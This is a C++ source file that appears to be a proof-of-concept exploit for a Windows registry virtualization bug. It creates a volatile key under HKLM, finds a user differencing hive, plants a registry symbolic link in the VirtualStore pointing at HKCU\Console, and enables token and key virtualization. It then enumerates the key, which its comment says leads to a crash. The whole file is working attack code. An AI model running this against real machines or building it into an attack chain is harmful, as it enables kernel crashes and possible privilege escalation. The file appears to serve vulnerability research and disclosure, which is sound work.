#define WIN32_NO_STATUS
#include <Windows.h>
#undef WIN32_NO_STATUS
#include <sddl.h>
#include <winternl.h>

#include <cstdio>

#pragma comment(lib, "ntdll")

typedef struct _KEY_SET_VIRTUALIZATION_INFORMATION {
  ULONG   VirtualTarget : 1; // Tells if the key is a virtual target key.
  ULONG   VirtualStore : 1;  // Tells if the key is a virtual store key.
  ULONG   VirtualSource : 1; // Tells if the key has been virtualized at least one (virtual hint)
  ULONG   Reserved : 29;
} KEY_SET_VIRTUALIZATION_INFORMATION, * PKEY_SET_VIRTUALIZATION_INFORMATION;

BOOL EnableKeyVirtualization(HKEY hkey,
                             BOOL VirtualTarget,
                             BOOL VirtualStore,
                             BOOL VirtualSource) {

  KEY_SET_VIRTUALIZATION_INFORMATION VirtInfo;
  VirtInfo.VirtualTarget = VirtualTarget;
  VirtInfo.VirtualStore = VirtualStore;
  VirtInfo.VirtualSource = VirtualSource;
  VirtInfo.Reserved = 0;

  NTSTATUS Status = NtSetInformationKey(hkey,
                                        KeySetVirtualizationInformation,
                                        &VirtInfo,
                                        sizeof(VirtInfo));

  return NT_SUCCESS(Status);
}

BOOL EnableTokenVirtualization(HANDLE hToken, BOOL bEnabled) {
  DWORD dwVirtualizationEnabled = bEnabled;
  if (!SetTokenInformation(hToken,
                           TokenVirtualizationEnabled,
                           &dwVirtualizationEnabled,
                           sizeof(dwVirtualizationEnabled))) {
    printf("SetTokenInformation failed with error %u\n", GetLastError());
    return FALSE;
  }

  return TRUE;
}

int main(int argc, char** argv) {
  LONG st;

  //
  // Create a test key in a world-writable location under HKLM\Software.
  //

  HKEY hDrmTest;
  st = RegCreateKeyExW(HKEY_LOCAL_MACHINE,
                       L"Software\\Microsoft\\DRM\\TestKey",
                       0,
                       NULL,
                       REG_OPTION_VOLATILE,
                       KEY_ALL_ACCESS,
                       NULL,
                       &hDrmTest,
                       NULL);

  if (st != ERROR_SUCCESS) {
    printf("RegCreateKeyExW failed with error %d\n", st);
    return 1;
  }

  //
  // Find an active differencing hive pointing at HKCU.
  //

  HKEY hHiveList;
  WCHAR wchValueName[200];
  DWORD cchValueName;

  st = RegOpenKeyExW(HKEY_LOCAL_MACHINE,
                     L"SYSTEM\\CurrentControlSet\\Control\\hivelist",
                     0,
                     KEY_READ,
                     &hHiveList);

  if (st != ERROR_SUCCESS) {
    printf("RegOpenKeyExW failed with error %d\n", st);
    return 1;
  }

  for (DWORD dwIndex = 0;; dwIndex++) {
    cchValueName = sizeof(wchValueName) / sizeof(WCHAR);

    st = RegEnumValueW(hHiveList,
                       dwIndex,
                       wchValueName,
                       &cchValueName,
                       NULL,
                       NULL,
                       NULL,
                       NULL);

    if (st != ERROR_SUCCESS) {
      printf("RegEnumValueW failed with error %d\n", st);
      return 1;
    }

    if (!_wcsnicmp(wchValueName, L"\\REGISTRY\\WC\\Silo", 17) &&
      !_wcsicmp(&wchValueName[cchValueName - 8], L"user_sid")) {
      break;
    }
  }

  RegCloseKey(hHiveList);

  wcsncat_s(wchValueName, L"\\Console", 8);

  //
  // Open HKCU\Software\Classes\VirtualStore\Machine\Software\Microsoft\DRM.
  //

  HKEY hVirtStore;
  st = RegCreateKeyExW(HKEY_CURRENT_USER,
                       L"Software\\Classes\\VirtualStore\\Machine\\Software\\"
                       "Microsoft\\DRM",
                       0,
                       NULL,
                       REG_OPTION_VOLATILE,
                       KEY_ALL_ACCESS,
                       NULL,
                       &hVirtStore,
                       NULL);

  if (st != ERROR_SUCCESS && st != ERROR_ALREADY_EXISTS) {
    printf("Failed to open the VirtualStore key with error %d\n", st);
    return 1;
  }

  //
  // Create a symbolic link at
  // HKCU\Software\Classes\VirtualStore\Machine\Software\Microsoft\DRM\TestKey,
  // pointing at HKCU\Console through the differencing hive.
  //

  HKEY hVirtStoreTestKey;
  st = RegCreateKeyExW(hVirtStore,
                       L"TestKey",
                       0,
                       NULL,
                       REG_OPTION_VOLATILE | REG_OPTION_CREATE_LINK,
                       KEY_ALL_ACCESS,
                       NULL,
                       &hVirtStoreTestKey,
                       NULL);

  if (st == ERROR_ALREADY_EXISTS) {
    st = RegOpenKeyExW(hVirtStore,
                       L"TestKey",
                       REG_OPTION_OPEN_LINK,
                       KEY_ALL_ACCESS,
                       &hVirtStoreTestKey);
  }

  if (st != ERROR_SUCCESS) {
    printf("RegCreateKeyExW/RegOpenKeyExW failed with error %d\n", st);
    return 1;
  }

  st = RegSetKeyValueW(hVirtStoreTestKey,
                       NULL,
                       L"SymbolicLinkValue",
                       REG_LINK,
                       wchValueName,
                       wcslen(wchValueName) * sizeof(WCHAR));

  if (st != ERROR_SUCCESS) {
    printf("RegSetKeyValueW failed with error %d\n", st);
    return 1;
  }

  //
  // Enable virtualization for our process and the real/virtual keys.
  //

  HANDLE hToken;
  if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken)) {
    printf("OpenProcessToken failed with error %u\n", GetLastError());
    return 1;
  }

  EnableTokenVirtualization(hToken, TRUE);

  if (!EnableKeyVirtualization(hDrmTest,
                               /*VirtualTarget=*/FALSE,
                               /*VirtualStore=*/ FALSE,
                               /*VirtualSource=*/TRUE) ||
      !EnableKeyVirtualization(hVirtStoreTestKey,
                               /*VirtualTarget=*/TRUE,
                               /*VirtualStore=*/ FALSE,
                               /*VirtualSource=*/FALSE)) {
    printf("Failed to enable key virtualization\n");
    return 1;
  }

  //
  // Try to enumerate the test key in HKLM, leading to a crash.
  //

  cchValueName = sizeof(wchValueName) / sizeof(WCHAR);

  st = RegEnumValueW(hDrmTest,
                     0,
                     wchValueName,
                     &cchValueName,
                     NULL,
                     NULL,
                     NULL,
                     NULL);

  if (st != ERROR_SUCCESS) {
    printf("RegEnumValueW failed with error %d\n", st);
    return 1;
  }

  RegCloseKey(hDrmTest);
  RegCloseKey(hVirtStore);
  RegCloseKey(hVirtStoreTestKey);
  CloseHandle(hToken);

  return 0;
}
